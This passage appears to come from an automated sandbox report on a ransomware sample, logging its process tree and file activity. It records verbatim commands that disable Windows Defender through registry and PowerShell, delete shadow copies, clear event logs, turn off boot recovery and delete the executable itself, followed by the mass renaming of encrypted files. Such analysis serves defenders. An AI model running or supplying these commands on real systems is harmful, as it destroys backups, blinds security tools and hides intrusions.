| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
Network
Files
memory/1452-54-0x0000000000000000-mapping.dmp
memory/760-55-0x0000000000000000-mapping.dmp
memory/428-56-0x0000000000000000-mapping.dmp
memory/1060-57-0x0000000000000000-mapping.dmp
memory/592-58-0x0000000000000000-mapping.dmp
memory/1596-59-0x0000000000000000-mapping.dmp
memory/1836-60-0x0000000000000000-mapping.dmp
memory/432-61-0x0000000000000000-mapping.dmp
memory/1804-62-0x0000000000000000-mapping.dmp
memory/1876-63-0x0000000000000000-mapping.dmp
memory/1040-64-0x0000000000000000-mapping.dmp
memory/1504-65-0x0000000000000000-mapping.dmp
memory/1568-66-0x0000000000000000-mapping.dmp
memory/952-67-0x0000000000000000-mapping.dmp
memory/1776-68-0x0000000000000000-mapping.dmp
memory/1624-69-0x0000000000000000-mapping.dmp
memory/968-70-0x0000000000000000-mapping.dmp
memory/1288-71-0x0000000000000000-mapping.dmp
memory/1752-72-0x0000000000000000-mapping.dmp
memory/1732-73-0x0000000000000000-mapping.dmp
memory/1276-74-0x0000000000000000-mapping.dmp
memory/2028-75-0x0000000000000000-mapping.dmp
memory/1564-76-0x0000000000000000-mapping.dmp
memory/1924-77-0x0000000000000000-mapping.dmp
memory/1708-78-0x0000000000000000-mapping.dmp
memory/268-79-0x0000000000000000-mapping.dmp
memory/1036-80-0x0000000000000000-mapping.dmp
memory/564-81-0x0000000000000000-mapping.dmp
memory/1596-82-0x0000000000000000-mapping.dmp
memory/808-83-0x0000000000000000-mapping.dmp
memory/1168-84-0x0000000000000000-mapping.dmp
memory/660-85-0x0000000000000000-mapping.dmp
memory/1152-86-0x0000000000000000-mapping.dmp
memory/1524-87-0x0000000000000000-mapping.dmp
memory/1392-88-0x0000000000000000-mapping.dmp
memory/1620-89-0x0000000000000000-mapping.dmp
memory/560-90-0x0000000000000000-mapping.dmp
memory/1244-91-0x0000000000000000-mapping.dmp
memory/912-92-0x0000000000000000-mapping.dmp
memory/1044-93-0x0000000000000000-mapping.dmp
memory/888-94-0x0000000000000000-mapping.dmp
memory/884-95-0x0000000000000000-mapping.dmp
memory/1616-96-0x0000000000000000-mapping.dmp
memory/1824-97-0x0000000000000000-mapping.dmp
memory/1852-98-0x0000000000000000-mapping.dmp
memory/1320-99-0x0000000000000000-mapping.dmp
memory/612-100-0x0000000000000000-mapping.dmp
memory/2000-101-0x0000000000000000-mapping.dmp
memory/1696-102-0x0000000000000000-mapping.dmp
memory/924-103-0x0000000000000000-mapping.dmp
memory/1744-104-0x0000000000000000-mapping.dmp
memory/1612-105-0x0000000000000000-mapping.dmp
memory/760-106-0x0000000000000000-mapping.dmp
memory/744-107-0x0000000000000000-mapping.dmp
memory/1816-108-0x0000000000000000-mapping.dmp
memory/1504-109-0x0000000000000000-mapping.dmp
memory/1872-110-0x0000000000000000-mapping.dmp
memory/540-111-0x0000000000000000-mapping.dmp
memory/1760-112-0x0000000000000000-mapping.dmp
memory/1760-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
memory/1060-114-0x0000000000000000-mapping.dmp
memory/1928-116-0x0000000000000000-mapping.dmp
memory/1748-118-0x0000000000000000-mapping.dmp
memory/812-119-0x0000000000000000-mapping.dmp
memory/1920-120-0x0000000000000000-mapping.dmp
memory/1868-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
memory/1868-124-0x0000000002412000-0x0000000002414000-memory.dmp
memory/1868-126-0x000000000241B000-0x000000000243A000-memory.dmp
memory/1868-125-0x0000000002414000-0x0000000002417000-memory.dmp
memory/1868-123-0x0000000002410000-0x0000000002412000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b8e610b2334f1c528aa7ec5b8c07f1e4 |
| SHA1 | 3583b173c98b14b9fc18c798cecd94fd9889fb31 |
| SHA256 | 187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792 |
| SHA512 | 743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494 |
memory/2136-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2136-130-0x000000001B7C0000-0x000000001BABF000-memory.dmp
memory/2136-133-0x0000000002804000-0x0000000002807000-memory.dmp
memory/2136-132-0x0000000002802000-0x0000000002804000-memory.dmp
memory/2136-131-0x0000000002800000-0x0000000002802000-memory.dmp
memory/2136-134-0x000000000280B000-0x000000000282A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win10-en-20211208
Max time kernel
186s
Max time network
224s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CompareSkip.tif => C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MoveComplete.png => C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterUnlock.png => C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyRename.crw => C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenCompress.tiff => C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitOpen.png => C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitOut.crw => C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeRestore.tiff => C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_obhWKhFTuLo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_RDhSc56wBVE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\wfh.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ro-bXZoO6bQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ul.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_BRdfIGodR2g0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13s.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wlYSDYHTp-00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_SuH2a19fxdY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_iBfE7dIDHt40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-16_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\176.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\cardsLoadingSequence.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6918_40x40x32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_0iYS1xh8QEk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_yARMXAq_nvc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_QnDoyUOAMTA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\af_60x42.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\iheart-radio.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Show.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\MedTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
